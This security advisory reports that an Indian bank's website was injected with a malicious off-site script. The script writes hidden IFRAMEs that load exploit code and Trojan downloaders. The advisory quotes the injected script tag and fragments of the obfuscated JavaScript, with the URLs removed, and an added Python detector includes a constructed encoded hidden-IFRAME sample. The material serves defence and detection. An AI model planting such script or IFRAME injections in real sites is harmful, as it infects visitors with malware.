Websense® Security Labs™ has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in)
was compromised with a malicious script that attempts to exploit
multiple vulnerabilities. When customers visit the web site, a
malicious JavaScript file (e.js) is executed and creates two additional
iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\"));");
document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

JavaScript from e.js (seen above) creates two new IFRAME elements
within the page. One IFRAME attempts to load exploit code and the other
creates several additional IFRAMEs that contain advertisement-related
content. The exploit will try to load a Trojan Downloader (qq.exe)
which will contact a remote server to download the following Trojan
Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.
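
A defender-side check for the two patterns described above: an off-site script include in the page, and percent-encoded IFRAME markup written out by the script. This is an added example, not code from the original advisory; the host `injected.example`, both sample inputs and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

SITE_HOST = "www.syndicatebank.in"  # host named in the advisory

# Constructed sample inputs; injected.example is a placeholder host.
SAMPLE_PAGE = (
    '<html><head><script src="/js/menu.js"></script></head><body>'
    "<script src=http://injected.example/e.js></script></body></html>"
)
SAMPLE_JS = (
    r'document.writeln("document.write(unescape(\"%3CIFraMe%20src%3D%22'
    r"http%3A%2F%2Finjected.example%2Fa.htm%22%20width%3D%220%22%20"
    r'FraMebOrder%3D%220%22%3E%3C\/IFraMe%3E\"));");'
)


class ScriptSrcCollector(HTMLParser):
    """Collects the src of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def offsite_scripts(page_html, site_host=SITE_HOST):
    """Return script URLs served from a host other than the site's own."""
    collector = ScriptSrcCollector()
    collector.feed(page_html)
    # Relative URLs have no hostname and count as first-party.
    return [s for s in collector.sources
            if (urlparse(s).hostname or site_host).lower() != site_host.lower()]


def hidden_iframes(js_text, rounds=3):
    """Percent-decode script text and return the IFRAME tags it would write."""
    decoded = js_text
    for _ in range(rounds):  # repeated passes cover nested encoding
        decoded = unquote(decoded)
    decoded = decoded.replace("\\/", "/")  # undo JS-escaped slashes
    # Case-insensitive match catches mixed-case spellings such as IFraMe.
    return re.findall(r"<iframe\b[^>]*>", decoded, flags=re.IGNORECASE)
```

Run `offsite_scripts` against a fetched copy of each page and `hidden_iframes` against every script it references; any hit outside a known-good allowlist warrants review.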
